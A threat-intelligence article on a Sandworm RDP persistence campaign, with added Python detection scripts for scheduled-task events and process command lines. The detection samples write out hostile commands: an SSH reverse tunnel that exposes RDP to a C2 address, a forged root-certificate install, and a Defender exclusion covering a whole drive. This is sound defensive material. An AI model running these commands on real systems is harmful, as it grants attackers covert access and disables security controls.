APT Hackers Exploit RDP Servers to Deploy Malware, Establish Persistence
Key Takeaways
- A sophisticated state-sponsored threat actor, known as APT-C-13 (Sandworm), has shifted its strategy from destructive attacks to long-term intelligence gathering.
- The group is targeting critical infrastructure, defense organizations, and government agencies, particularly in Ukraine, and abusing Remote Desktop Protocol (RDP) on compromised hosts for long-term access.
- The attack chain leverages social engineering via a fake Microsoft Office ISO image to deploy a modular penetration framework (Tambur/Sumbur/Kalambur series).
- Attackers establish covert persistence and exfiltrate data undetected by using legitimate Windows tools, SSH reverse tunnels, and Tor, and by installing a forged root certificate into the trusted store.
APT-C-13 Shifts Tactics to Long-Term RDP Infiltration
One of the world’s most formidable state-backed hacking groups, tracked as APT-C-13 and widely known by aliases such as Sandworm, APT44, Seashell Blizzard, and Voodoo Bear, is actively abusing Remote Desktop Protocol (RDP) on compromised hosts. The group, whose cyber operations date back to at least 2009, is now focusing its efforts on critical infrastructure, defense organizations, and government agencies.
This latest campaign signifies a notable strategic evolution for APT-C-13. Instead of executing immediate, destructive cyberattacks, the group is now prioritizing stealthy, prolonged infiltration designed to harvest intelligence over extended periods. This represents a move from “instantaneous disruption” to “intelligence-driven persistent parasitism,” a calculated shift observed between 2024 and 2026, according to researchers.
Initial Infection Vector and Malware Deployment
The campaign begins with a deceptive ISO image named Microsoft.Office.2025x64.v2025.iso, distributed primarily through Telegram channels and software-cracking communities popular in Ukraine. Victims are lured into mounting the image and attempting to install or activate what appears to be legitimate Microsoft Office software.
Once the victim runs the supposed installer, hidden executables named auto.exe or setup.exe launch silently in the background. The social engineering relies on user trust in familiar software names. An initial loader then profiles the compromised system before selectively deploying additional malicious modules.
Analysts at the 360 Threat Intelligence Center, who published their findings on Weixin (WeChat), have tracked this campaign in detail. They confirmed that APT-C-13 is deploying a modular penetration framework, collectively referred to as the Tambur/Sumbur/Kalambur series. One confirmed victim is a technician at a Ukrainian state-owned shipbuilding and machinery manufacturing plant, where the attackers had already established deep, covert access.
The primary concern is the attackers’ reliance on legitimate Windows tools, including scheduled tasks, SSH, PowerShell, and RDP. Because these are expected, signed binaries, the activity often slips past conventional antivirus, and organizations remain exposed for long periods. The group’s patience means it can stay embedded for months, slowly exfiltrating sensitive data from inside the trusted network; by the time an intrusion is detected, the intelligence objectives have likely already been met.
Persistence Through RDP Hijacking and Covert Tunneling
A critical aspect of this campaign is the attackers’ advanced methods for establishing and maintaining covert, long-term persistence within compromised environments.
Scheduled Tasks and Credential Theft
The Tambur module handles persistence by creating scheduled tasks named “Tambur” and “Protector” under the Task Scheduler path \Microsoft\Windows\WDI\Protector, chosen to resemble a native Windows Diagnostic Infrastructure (WDI) component and so avoid suspicion. The tasks run with full administrator privileges and use a hardcoded password, 1qaz@WSX, to ensure constant, uninterrupted access to the RDP service on the infected host.
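Task creation of this kind leaves a Security event 4698 behind, and its embedded task XML carries exactly the traits described above. The following Python triage script is an added example, not code from the original page or from the 360 report: it parses a 4698 event and flags a task hiding in the WDI folder, an action binary outside the Windows directory, and an elevated task registered with a stored password. The two events are constructed samples, and the allowlist of stock WDI tasks (only ResolutionHost) is an assumption to verify against your own Windows build.

```python
"""Triage Windows Security event 4698 (scheduled task created) for Tambur-style
persistence: a task hidden in the WDI folder, an action binary outside the
Windows directory, and an elevated task registered with a stored password.
Added example; the events below are constructed, not real captures."""
import re
import xml.etree.ElementTree as ET

EVT_NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

WDI_FOLDER = "\\microsoft\\windows\\wdi\\"
# Assumption: ResolutionHost is the only stock task under \Microsoft\Windows\WDI\;
# check this against a clean reference host before deploying the rule.
KNOWN_WDI_TASKS = {"\\microsoft\\windows\\wdi\\resolutionhost"}
SYSTEM_ROOT = "c:\\windows\\"

# Constructed 4698 event mirroring the article's description (WDI folder,
# admin run level, stored password, binary under ProgramData).
SAMPLE_MALICIOUS = r"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>4698</EventID><Computer>WS01</Computer></System>
  <EventData>
    <Data Name="SubjectUserName">tech</Data>
    <Data Name="TaskName">\Microsoft\Windows\WDI\Protector</Data>
    <Data Name="TaskContent">&lt;?xml version="1.0" encoding="UTF-16"?&gt;
&lt;Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"&gt;
&lt;Principals&gt;&lt;Principal id="Author"&gt;&lt;UserId&gt;WS01\tech&lt;/UserId&gt;
&lt;LogonType&gt;Password&lt;/LogonType&gt;&lt;RunLevel&gt;HighestAvailable&lt;/RunLevel&gt;&lt;/Principal&gt;&lt;/Principals&gt;
&lt;Actions Context="Author"&gt;&lt;Exec&gt;&lt;Command&gt;C:\ProgramData\Tambur\auto.exe&lt;/Command&gt;&lt;/Exec&gt;&lt;/Actions&gt;
&lt;/Task&gt;</Data>
  </EventData>
</Event>"""

# Constructed benign event: a stock-looking task with a binary under C:\Windows.
SAMPLE_BENIGN = r"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>4698</EventID><Computer>WS01</Computer></System>
  <EventData>
    <Data Name="SubjectUserName">SYSTEM</Data>
    <Data Name="TaskName">\Microsoft\Windows\Defrag\ScheduledDefrag</Data>
    <Data Name="TaskContent">&lt;?xml version="1.0" encoding="UTF-16"?&gt;
&lt;Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"&gt;
&lt;Principals&gt;&lt;Principal id="LocalSystem"&gt;&lt;UserId&gt;S-1-5-18&lt;/UserId&gt;&lt;RunLevel&gt;HighestAvailable&lt;/RunLevel&gt;&lt;/Principal&gt;&lt;/Principals&gt;
&lt;Actions Context="LocalSystem"&gt;&lt;Exec&gt;&lt;Command&gt;%windir%\system32\defrag.exe&lt;/Command&gt;&lt;Arguments&gt;-c -h -o&lt;/Arguments&gt;&lt;/Exec&gt;&lt;/Actions&gt;
&lt;/Task&gt;</Data>
  </EventData>
</Event>"""


def _event_data(event: ET.Element) -> dict:
    """Return the <Data Name="..."> fields of a Windows event as a dict."""
    return {d.get("Name"): (d.text or "") for d in event.findall("e:EventData/e:Data", EVT_NS)}


def _parse_task_xml(task_content: str) -> ET.Element:
    """Parse the task definition embedded in TaskContent. It carries its own
    XML declaration (UTF-16); drop it because we already hold decoded text."""
    body = re.sub(r"^\s*<\?xml[^>]*\?>", "", task_content, count=1)
    return ET.fromstring(body)


def analyze_4698(event_xml: str) -> dict:
    """Extract task name, action and principal from a 4698 event and list findings."""
    event = ET.fromstring(event_xml)
    event_id = event.findtext("e:System/e:EventID", default="", namespaces=EVT_NS)
    if event_id != "4698":
        raise ValueError(f"not a task-creation event: {event_id!r}")
    data = _event_data(event)
    task_name = data.get("TaskName", "")
    task = _parse_task_xml(data.get("TaskContent", ""))
    command = task.findtext("t:Actions/t:Exec/t:Command", default="", namespaces=TASK_NS)
    run_level = task.findtext("t:Principals/t:Principal/t:RunLevel", default="", namespaces=TASK_NS)
    logon_type = task.findtext("t:Principals/t:Principal/t:LogonType", default="", namespaces=TASK_NS)

    findings = []
    name_l = task_name.lower()
    if name_l.startswith(WDI_FOLDER) and name_l not in KNOWN_WDI_TASKS:
        findings.append("unknown task in WDI folder")
    cmd_l = command.strip().strip('"').lower()
    for var in ("%systemroot%", "%windir%"):
        cmd_l = cmd_l.replace(var, "c:\\windows")
    if command and not cmd_l.startswith(SYSTEM_ROOT):
        findings.append(f"action outside Windows directory: {command}")
    if run_level == "HighestAvailable" and logon_type == "Password":
        findings.append("elevated task registered with a stored password (LogonType=Password)")
    return {"task_name": task_name, "command": command,
            "creator": data.get("SubjectUserName", ""), "findings": findings}


if __name__ == "__main__":
    for sample in (SAMPLE_MALICIOUS, SAMPLE_BENIGN):
        result = analyze_4698(sample)
        print(result["task_name"], "->", result["findings"] or "clean")
```

Event 4698 is only written when the "Audit Other Object Access Events" subcategory is enabled, so confirm that policy is in place before relying on this. Feed the script the XML view of events exported from Event Viewer or `wevtutil`, and treat a hit as a lead to inspect the task with `schtasks /query /xml`, not as a verdict.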
Anonymous Command and Control and Remote Access
The Kalambur and Sumbur modules add operational security by routing all command-and-control (C2) traffic through the Tor anonymity network, hiding the attackers’ true location. They also open an SSH reverse tunnel from the victim to a remote C2 server, exposing the victim’s RDP port (3389) on the remote end; the attackers can then log in over RDP from anywhere without any inbound connection to the victim’s network and without the host ever listening on a new port. Sumbur, a later iteration of the framework, masquerades as Microsoft Edge’s update service, storing malicious VBScripts in a fake Edge update directory and triggering them every four hours so that the activity blends in with routine software updates.
Security Evasion and System Compromise
The chain ends with the DemiMur module, which installs a forged root certificate named DemiMurCA.crt into the system’s trusted root store. Any later payload signed with a certificate chaining to that root then passes Windows’ signature checks as if it were legitimately signed. Coupled with forced Microsoft Defender exclusions that cover the entire C: drive, the host’s native security mechanisms are effectively neutralized, leaving the attackers an unmonitored operating environment.
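The tunnelling, Tor, fake Edge-update, root-certificate and Defender-exclusion behaviour in the last two sections all surface as process command lines, so one added Python example (not code from the original page or from the 360 report) runs a small rule set over Sysmon-style process-creation records and serves both sections. The rule names, file paths, the C2 address 198.51.100.10 and every sample command line are constructed assumptions; the Edge-update rule additionally assumes that the genuine updater never runs VBScript.

```python
"""Rule-based triage of process-creation records (Sysmon event 1 style) for the
living-off-the-land tradecraft described above: an SSH reverse tunnel exposing
RDP, a Tor client, VBScript run from a fake Edge-update folder, a root
certificate being added, and a Defender exclusion covering a whole drive.
Added example; all records below are constructed, not real telemetry."""
import re

# Drive root such as C:\ or C:\* standing alone (not followed by a path), quoted or not.
DRIVE_ROOT = re.compile(r"(?<![\w\\])[a-z]:\\\*?(?=['\"\s,]|$)")
# OpenSSH -R [bind:]port:host:3389 publishes the victim's RDP port on the remote side.
SSH_REVERSE_RDP = re.compile(r"\s-r\s+\S*:3389(?:\s|$)")


def rule_ssh_reverse_rdp(image: str, cmd: str) -> bool:
    return image.endswith("ssh.exe") and SSH_REVERSE_RDP.search(cmd) is not None


def rule_tor_client(image: str, cmd: str) -> bool:
    # Heuristic: Tor binary name or a torrc passed with -f; a renamed binary
    # would need network telemetry instead.
    return image.endswith("tor.exe") or (" -f " in cmd and "torrc" in cmd)


def rule_vbs_from_edgeupdate_dir(image: str, cmd: str) -> bool:
    # Assumption: the genuine Edge updater never executes VBScript, so any .vbs
    # under an EdgeUpdate-named folder deserves a look.
    return image.endswith(("wscript.exe", "cscript.exe")) and "edgeupdate" in cmd and ".vbs" in cmd


def rule_root_cert_added(image: str, cmd: str) -> bool:
    certutil = image.endswith("certutil.exe") and "-addstore" in cmd and "root" in cmd
    ps = (image.endswith(("powershell.exe", "pwsh.exe"))
          and "import-certificate" in cmd and "localmachine\\root" in cmd)
    return certutil or ps


def rule_defender_drive_exclusion(image: str, cmd: str) -> bool:
    # Set-/Add-MpPreference -ExclusionPath pointing at a drive root.
    return "mppreference" in cmd and "-exclusionpath" in cmd and DRIVE_ROOT.search(cmd) is not None


RULES = [
    ("ssh_reverse_tunnel_exposes_rdp", rule_ssh_reverse_rdp),
    ("tor_client_started", rule_tor_client),
    ("vbscript_from_fake_edgeupdate_dir", rule_vbs_from_edgeupdate_dir),
    ("root_certificate_added", rule_root_cert_added),
    ("defender_exclusion_whole_drive", rule_defender_drive_exclusion),
]


def classify(record: dict) -> list:
    """Return the names of every rule matching one process-creation record."""
    image = record.get("Image", "").lower()
    cmd = record.get("CommandLine", "").lower()
    return [name for name, check in RULES if check(image, cmd)]


def scan(records) -> list:
    """Return (rule_name, CommandLine) pairs for every match, in record order."""
    return [(name, r.get("CommandLine", "")) for r in records for name in classify(r)]


# Constructed samples: five that mirror the article's tradecraft, then three
# benign look-alikes that must not fire.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\OpenSSH\ssh.exe",
     "CommandLine": r"ssh.exe -N -o StrictHostKeyChecking=no -i C:\ProgramData\Tambur\key -p 443 -R 0.0.0.0:2222:127.0.0.1:3389 sys@198.51.100.10"},
    {"Image": r"C:\ProgramData\Kalambur\tor.exe",
     "CommandLine": r"tor.exe -f C:\ProgramData\Kalambur\torrc"},
    {"Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r'wscript.exe //B "C:\ProgramData\Microsoft\EdgeUpdate\update.vbs"'},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -addstore -f Root C:\ProgramData\DemiMurCA.crt"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'''powershell.exe -NoP -C "Set-MpPreference -ExclusionPath 'C:\'"'''},
    {"Image": r"C:\Windows\System32\OpenSSH\ssh.exe",
     "CommandLine": "ssh.exe -T git@github.com"},
    {"Image": r"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe",
     "CommandLine": r'"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /c'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell.exe -C "Add-MpPreference -ExclusionPath C:\Builds\cache"'},
]

if __name__ == "__main__":
    for rule, cmdline in scan(SAMPLE_EVENTS):
        print(f"{rule:36} {cmdline}")
```

The rules match on lower-cased image names and command lines, so PowerShell case tricks do not help an attacker, but a renamed tor.exe or an SSH client other than OpenSSH will not be caught by name alone; pair these with network telemetry for outbound SSH on unusual ports and known Tor entry nodes. The narrow-exclusion record at the end is deliberately left unflagged: a path-scoped Defender exclusion is routine, a whole-drive one is not.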
What You Should Do
- Block Unauthorized Software: Immediately implement policies to block third-party activation tools and unauthorized ISO images from entering network environments.
- Enhanced Host and Network Monitoring: Monitor scheduled task creation, registry modifications, PowerShell execution, and outbound SSH and Tor connections for anomalous activity.
- Endpoint Security: Ensure all endpoint security solutions are fully updated and configured for regular, comprehensive scans. Consider advanced endpoint detection and response (EDR) solutions.
- Strengthen Auditing: Key institutions and industrial organizations should enhance internal auditing practices and develop specific detection rules for unusual RDP and SSH activity, new root certificates in the trusted store, and changes to Defender exclusions.
- User Awareness Training: Educate users about the risks of downloading and executing software from unofficial sources, particularly those promising “cracked” or free versions of commercial software.
Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.